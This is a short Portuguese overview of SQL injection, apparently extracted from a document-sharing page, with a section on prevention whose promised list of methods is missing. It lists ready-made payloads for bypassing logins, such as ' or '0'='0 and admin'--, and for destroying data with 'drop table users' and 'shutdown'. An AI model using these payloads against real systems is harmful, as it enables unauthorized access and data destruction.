Escolar Documentos
Profissional Documentos
Cultura Documentos
SQL Injection
Origem
Pode ser feito por 2 métodos: POST ou GET. Tendo como resposta os métodos SQL
Injection Error Based (com códigos de erro) ou SQL Injection Blind (sem códigos de
erros).
• Contorno da autenticação
Autenticar sem credenciais Nome de usuário: ‘ or’0’=’0
Senha: ‘ or’ “=’
Autenticar somente com usuário Nome de usuário: admin’--
Autenticar com o primeiro usuário da tabela Nome de usuário: ‘ ou 1=1-
Autenticar com usuário fictício Nome de usuário: union select 1,
‘user’, ‘passwd’, 1-
• Destruição de dados
Eliminar uma tabela do banco Nome do usuário: ‘ ; drop table users-
Fechar o banco de dados remotamente Nome de usuário: ‘aaaaaaaaaaaaa’
Senha: ‘;shutdown-
O SQL Injection é um dos ataques mais fáceis de evitar. Para que uma
vulnerabilidade exista, o desenvolvedor precisa usar instruções SQL dinâmicas e
concatenar a entrada diretamente com a instrução. Abaixo segue uma lista de
métodos que podem evitar um ataque de Injeção de SQL:
Conclusão
O SQL Injection se tornou o ataque preferido entre hackers de todos os níveis, pelo
fato de ter um grande impacto em organizações vulneráveis, de fácil aplicação e
com retorno praticamente garantido. Também tem sido o ataque mais defendido
justamente pelos mesmos motivos. Contudo não são todos os sites que estão
protegidos contra esse ataque.
Fontes